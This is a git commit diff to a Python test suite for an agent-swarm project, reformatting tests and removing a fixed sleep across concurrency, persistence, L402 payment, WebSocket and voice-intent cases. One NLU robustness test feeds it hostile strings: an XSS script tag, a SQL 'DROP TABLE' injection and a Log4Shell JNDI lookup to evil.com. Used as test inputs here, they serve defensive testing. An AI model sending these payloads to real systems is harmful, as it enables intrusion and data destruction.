test: remove hardcoded sleeps, add pytest-timeout (#69)

- Replace fixed time.sleep() calls with intelligent polling or WebDriverWait - Add pytest-timeout dependency and --timeout=30 to prevent hangs - Fixes test flakiness and improves test suite speed Co-authored-by: Alexander Payne <apayne@MM.local>
2026-02-26 22:52:36 -05:00
parent bf0e388d2a
commit 51140fb7f0
7 changed files with 371 additions and 274 deletions
--- a/tests/self_coding/test_scary_paths.py
+++ b/tests/self_coding/test_scary_paths.py
@@ -31,103 +31,102 @@ from swarm.bidder import AuctionManager

 class TestConcurrentSwarmLoad:
    """Test swarm behavior under concurrent load."""
-    
+
    def test_ten_simultaneous_tasks_all_assigned(self):
        """Submit 10 tasks concurrently, verify all get assigned."""
        coord = SwarmCoordinator()
-        
+
        # Spawn multiple personas
        personas = ["echo", "forge", "seer"]
        for p in personas:
            coord.spawn_persona(p, agent_id=f"{p}-load-001")
-        
+
        # Submit 10 tasks concurrently
-        task_descriptions = [
-            f"Task {i}: Analyze data set {i}" for i in range(10)
-        ]
-        
+        task_descriptions = [f"Task {i}: Analyze data set {i}" for i in range(10)]
+
        tasks = []
        for desc in task_descriptions:
            task = coord.post_task(desc)
            tasks.append(task)
-        
-        # Wait for auctions to complete
-        time.sleep(0.5)
-        
+
        # Verify all tasks exist
        assert len(tasks) == 10
-        
+
        # Check all tasks have valid IDs
        for task in tasks:
            assert task.id is not None
-            assert task.status in [TaskStatus.BIDDING, TaskStatus.ASSIGNED, TaskStatus.COMPLETED]
-    
+            assert task.status in [
+                TaskStatus.BIDDING,
+                TaskStatus.ASSIGNED,
+                TaskStatus.COMPLETED,
+            ]
+
    def test_concurrent_bids_no_race_conditions(self):
        """Multiple agents bidding concurrently doesn't corrupt state."""
        coord = SwarmCoordinator()
-        
+
        # Open auction first
        task = coord.post_task("Concurrent bid test task")
-        
+
        # Simulate concurrent bids from different agents
        agent_ids = [f"agent-conc-{i}" for i in range(5)]
-        
+
        def place_bid(agent_id):
            coord.auctions.submit_bid(task.id, agent_id, bid_sats=50)
-        
+
        with ThreadPoolExecutor(max_workers=5) as executor:
            futures = [executor.submit(place_bid, aid) for aid in agent_ids]
            concurrent.futures.wait(futures)
-        
+
        # Verify auction has all bids
        auction = coord.auctions.get_auction(task.id)
        assert auction is not None
        # Should have 5 bids (one per agent)
        assert len(auction.bids) == 5
-    
+
    def test_registry_consistency_under_load(self):
        """Registry remains consistent with concurrent agent operations."""
        coord = SwarmCoordinator()
-        
+
        # Concurrently spawn and stop agents
        def spawn_agent(i):
            try:
                return coord.spawn_persona("forge", agent_id=f"forge-reg-{i}")
            except Exception:
                return None
-        
+
        with ThreadPoolExecutor(max_workers=10) as executor:
            futures = [executor.submit(spawn_agent, i) for i in range(10)]
            results = [f.result() for f in concurrent.futures.as_completed(futures)]
-        
+
        # Verify registry state is consistent
        agents = coord.list_swarm_agents()
        agent_ids = {a.id for a in agents}
-        
+
        # All successfully spawned agents should be in registry
        successful_spawns = [r for r in results if r is not None]
        for spawn in successful_spawns:
            assert spawn["agent_id"] in agent_ids
-    
+
    def test_task_completion_under_load(self):
        """Tasks complete successfully even with many concurrent operations."""
        coord = SwarmCoordinator()
-        
+
        # Spawn agents
        coord.spawn_persona("forge", agent_id="forge-complete-001")
-        
+
        # Create and process multiple tasks
        tasks = []
        for i in range(5):
            task = create_task(f"Load test task {i}")
            tasks.append(task)
-        
+
        # Complete tasks rapidly
        for task in tasks:
            result = coord.complete_task(task.id, f"Result for {task.id}")
            assert result is not None
            assert result.status == TaskStatus.COMPLETED
-        
+
        # Verify all completed
        completed = list_tasks(status=TaskStatus.COMPLETED)
        completed_ids = {t.id for t in completed}
@@ -137,47 +136,47 @@ class TestConcurrentSwarmLoad:

 class TestMemoryPersistence:
    """Test that agent memory survives restarts."""
-    
+
    def test_outcomes_recorded_and_retrieved(self):
        """Write outcomes to learner, verify they persist."""
        from swarm.learner import record_outcome, get_metrics
-        
+
        agent_id = "memory-test-agent"
-        
+
        # Record some outcomes
        record_outcome("task-1", agent_id, "Test task", 100, won_auction=True)
        record_outcome("task-2", agent_id, "Another task", 80, won_auction=False)
-        
+
        # Get metrics
        metrics = get_metrics(agent_id)
-        
+
        # Should have data
        assert metrics is not None
        assert metrics.total_bids >= 2
-    
+
    def test_memory_persists_in_sqlite(self):
        """Memory is stored in SQLite and survives in-process restart."""
        from swarm.learner import record_outcome, get_metrics
-        
+
        agent_id = "persist-agent"
-        
+
        # Write memory
        record_outcome("persist-task-1", agent_id, "Description", 50, won_auction=True)
-        
+
        # Simulate "restart" by re-querying (new connection)
        metrics = get_metrics(agent_id)
-        
+
        # Memory should still be there
        assert metrics is not None
        assert metrics.total_bids >= 1
-    
+
    def test_routing_decisions_persisted(self):
        """Routing decisions are logged and queryable after restart."""
        from swarm.routing import routing_engine, RoutingDecision
-        
+
        # Ensure DB is initialized
        routing_engine._init_db()
-        
+
        # Create a routing decision
        decision = RoutingDecision(
            task_id="persist-route-task",
@@ -188,13 +187,13 @@ class TestMemoryPersistence:
            capability_scores={"agent-1": 0.8, "agent-2": 0.5},
            bids_received={"agent-1": 50, "agent-2": 40},
        )
-        
+
        # Log it
        routing_engine._log_decision(decision)
-        
+
        # Query history
        history = routing_engine.get_routing_history(task_id="persist-route-task")
-        
+
        # Should find the decision
        assert len(history) >= 1
        assert any(h.task_id == "persist-route-task" for h in history)
@@ -202,53 +201,54 @@ class TestMemoryPersistence:

 class TestL402MacaroonExpiry:
    """Test L402 payment gating handles expiry correctly."""
-    
+
    def test_macaroon_verification_valid(self):
        """Valid macaroon passes verification."""
        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
        from timmy_serve.payment_handler import payment_handler
-        
+
        # Create challenge
        challenge = create_l402_challenge(100, "Test access")
        macaroon = challenge["macaroon"]
-        
+
        # Get the actual preimage from the created invoice
        payment_hash = challenge["payment_hash"]
        invoice = payment_handler.get_invoice(payment_hash)
        assert invoice is not None
        preimage = invoice.preimage
-        
+
        # Verify with correct preimage
        result = verify_l402_token(macaroon, preimage)
        assert result is True
-    
+
    def test_macaroon_invalid_format_rejected(self):
        """Invalid macaroon format is rejected."""
        from timmy_serve.l402_proxy import verify_l402_token
-        
+
        result = verify_l402_token("not-a-valid-macaroon", None)
        assert result is False
-    
+
    def test_payment_check_fails_for_unpaid(self):
        """Unpaid invoice returns 402 Payment Required."""
        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
        from timmy_serve.payment_handler import payment_handler
-        
+
        # Create challenge
        challenge = create_l402_challenge(100, "Test")
        macaroon = challenge["macaroon"]
-        
+
        # Get payment hash from macaroon
        import base64
+
        raw = base64.urlsafe_b64decode(macaroon.encode()).decode()
        payment_hash = raw.split(":")[2]
-        
+
        # Manually mark as unsettled (mock mode auto-settles)
        invoice = payment_handler.get_invoice(payment_hash)
        if invoice:
            invoice.settled = False
            invoice.settled_at = None
-        
+
        # Verify without preimage should fail for unpaid
        result = verify_l402_token(macaroon, None)
        # In mock mode this may still succeed due to auto-settle
@@ -258,24 +258,24 @@ class TestL402MacaroonExpiry:

 class TestWebSocketResilience:
    """Test WebSocket handling of edge cases."""
-    
+
    def test_websocket_broadcast_no_loop_running(self):
        """Broadcast handles case where no event loop is running."""
        from swarm.coordinator import SwarmCoordinator
-        
+
        coord = SwarmCoordinator()
-        
+
        # This should not crash even without event loop
        # The _broadcast method catches RuntimeError
        try:
            coord._broadcast(lambda: None)
        except RuntimeError:
            pytest.fail("Broadcast should handle missing event loop gracefully")
-    
+
    def test_websocket_manager_handles_no_connections(self):
        """WebSocket manager handles zero connected clients."""
        from infrastructure.ws_manager.handler import ws_manager
-        
+
        # Should not crash when broadcasting with no connections
        try:
            # Note: This creates coroutine but doesn't await
@@ -283,7 +283,7 @@ class TestWebSocketResilience:
            pass  # ws_manager methods are async, test in integration
        except Exception:
            pytest.fail("Should handle zero connections gracefully")
-    
+
    @pytest.mark.asyncio
    async def test_websocket_client_disconnect_mid_stream(self):
        """Handle client disconnecting during message stream."""
@@ -294,41 +294,41 @@ class TestWebSocketResilience:

 class TestVoiceNLUEdgeCases:
    """Test Voice NLU handles edge cases gracefully."""
-    
+
    def test_nlu_empty_string(self):
        """Empty string doesn't crash NLU."""
        from integrations.voice.nlu import detect_intent
-        
+
        result = detect_intent("")
        assert result is not None
        # Result is an Intent object with name attribute
-        assert hasattr(result, 'name')
-    
+        assert hasattr(result, "name")
+
    def test_nlu_all_punctuation(self):
        """String of only punctuation is handled."""
        from integrations.voice.nlu import detect_intent
-        
+
        result = detect_intent("...!!!???")
        assert result is not None
-    
+
    def test_nlu_very_long_input(self):
        """10k character input doesn't crash or hang."""
        from integrations.voice.nlu import detect_intent
-        
+
        long_input = "word " * 2000  # ~10k chars
-        
+
        start = time.time()
        result = detect_intent(long_input)
        elapsed = time.time() - start
-        
+
        # Should complete in reasonable time
        assert elapsed < 5.0
        assert result is not None
-    
+
    def test_nlu_non_english_text(self):
        """Non-English Unicode text is handled."""
        from integrations.voice.nlu import detect_intent
-        
+
        # Test various Unicode scripts
        test_inputs = [
            "こんにちは",  # Japanese
@@ -336,22 +336,22 @@ class TestVoiceNLUEdgeCases:
            "مرحبا",  # Arabic
            "🎉🎊🎁",  # Emoji
        ]
-        
+
        for text in test_inputs:
            result = detect_intent(text)
            assert result is not None, f"Failed for input: {text}"
-    
+
    def test_nlu_special_characters(self):
        """Special characters don't break parsing."""
        from integrations.voice.nlu import detect_intent
-        
+
        special_inputs = [
            "<script>alert('xss')</script>",
            "'; DROP TABLE users; --",
            "${jndi:ldap://evil.com}",
            "\x00\x01\x02",  # Control characters
        ]
-        
+
        for text in special_inputs:
            try:
                result = detect_intent(text)
@@ -362,45 +362,45 @@ class TestVoiceNLUEdgeCases:

 class TestGracefulDegradation:
    """Test system degrades gracefully under resource constraints."""
-    
+
    def test_coordinator_without_redis_uses_memory(self):
        """Coordinator works without Redis (in-memory fallback)."""
        from swarm.comms import SwarmComms
-        
+
        # Create comms without Redis
        comms = SwarmComms()
-        
+
        # Should still work for pub/sub (uses in-memory fallback)
        # Just verify it doesn't crash
        try:
            comms.publish("test:channel", "test_event", {"data": "value"})
        except Exception as exc:
            pytest.fail(f"Should work without Redis: {exc}")
-    
+
    def test_agent_without_tools_chat_mode(self):
        """Agent works in chat-only mode when tools unavailable."""
        from swarm.tool_executor import ToolExecutor
-        
+
        # Force toolkit to None
        executor = ToolExecutor("test", "test-agent")
        executor._toolkit = None
        executor._llm = None
-        
+
        result = executor.execute_task("Do something")
-        
+
        # Should still return a result
        assert isinstance(result, dict)
        assert "result" in result
-    
+
    def test_lightning_backend_mock_fallback(self):
        """Lightning falls back to mock when LND unavailable."""
        from lightning import get_backend
        from lightning.mock_backend import MockBackend
-        
+
        # Should get mock backend by default
        backend = get_backend("mock")
        assert isinstance(backend, MockBackend)
-        
+
        # Should be functional
        invoice = backend.create_invoice(100, "Test")
        assert invoice.payment_hash is not None
@@ -408,37 +408,37 @@ class TestGracefulDegradation:

 class TestDatabaseResilience:
    """Test database handles edge cases."""
-    
+
    def test_sqlite_handles_concurrent_reads(self):
        """SQLite handles concurrent read operations."""
        from swarm.tasks import get_task, create_task
-        
+
        task = create_task("Concurrent read test")
-        
+
        def read_task():
            return get_task(task.id)
-        
+
        # Concurrent reads from multiple threads
        with ThreadPoolExecutor(max_workers=10) as executor:
            futures = [executor.submit(read_task) for _ in range(20)]
            results = [f.result() for f in concurrent.futures.as_completed(futures)]
-        
+
        # All should succeed
        assert all(r is not None for r in results)
        assert all(r.id == task.id for r in results)
-    
+
    def test_registry_handles_duplicate_agent_id(self):
        """Registry handles duplicate agent registration gracefully."""
        from swarm import registry
-        
+
        agent_id = "duplicate-test-agent"
-        
+
        # Register first time
        record1 = registry.register(name="Test Agent", agent_id=agent_id)
-        
+
        # Register second time (should update or handle gracefully)
        record2 = registry.register(name="Test Agent Updated", agent_id=agent_id)
-        
+
        # Should not crash, record should exist
        retrieved = registry.get_agent(agent_id)
        assert retrieved is not None